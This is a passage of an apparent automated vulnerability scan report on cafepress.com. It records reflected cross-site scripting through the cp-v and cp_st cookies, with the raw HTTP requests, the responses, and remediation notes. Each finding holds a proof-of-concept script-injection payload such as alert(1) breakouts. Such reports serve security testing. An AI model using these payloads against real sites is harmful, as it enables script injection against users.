HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 71897 Date: Sun, 26 Dec 2010 13:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-gifts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b12</script><script>alert(1)</script>ef50e1d8ced was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-gifts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=73b12</script><script>alert(1)</script>ef50e1d8ced ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71920 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71920 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '73b12</script><script>alert(1)</script>ef50e1d8ced ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac27"-alert(1)-"47b4bca4067 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 54274 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/personalized-ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d007</script><script>alert(1)</script>1409bed2e4a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4d007</script><script>alert(1)</script>1409bed2e4a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 54293 Date: Sun, 26 Dec 2010 13:48:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54293 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '4d007</script><script>alert(1)</script>1409bed2e4a ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/photo-on-canvas
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 390f6"-alert(1)-"cf485b1a7be was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 64044 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 64044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/photo-on-canvas
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa097</script><script>alert(1)</script>ac2f65e7c84 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=aa097</script><script>alert(1)</script>ac2f65e7c84 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63812 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'aa097</script><script>alert(1)</script>ac2f65e7c84 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /sk/TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9"-alert(1)-"3e702ef6992 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 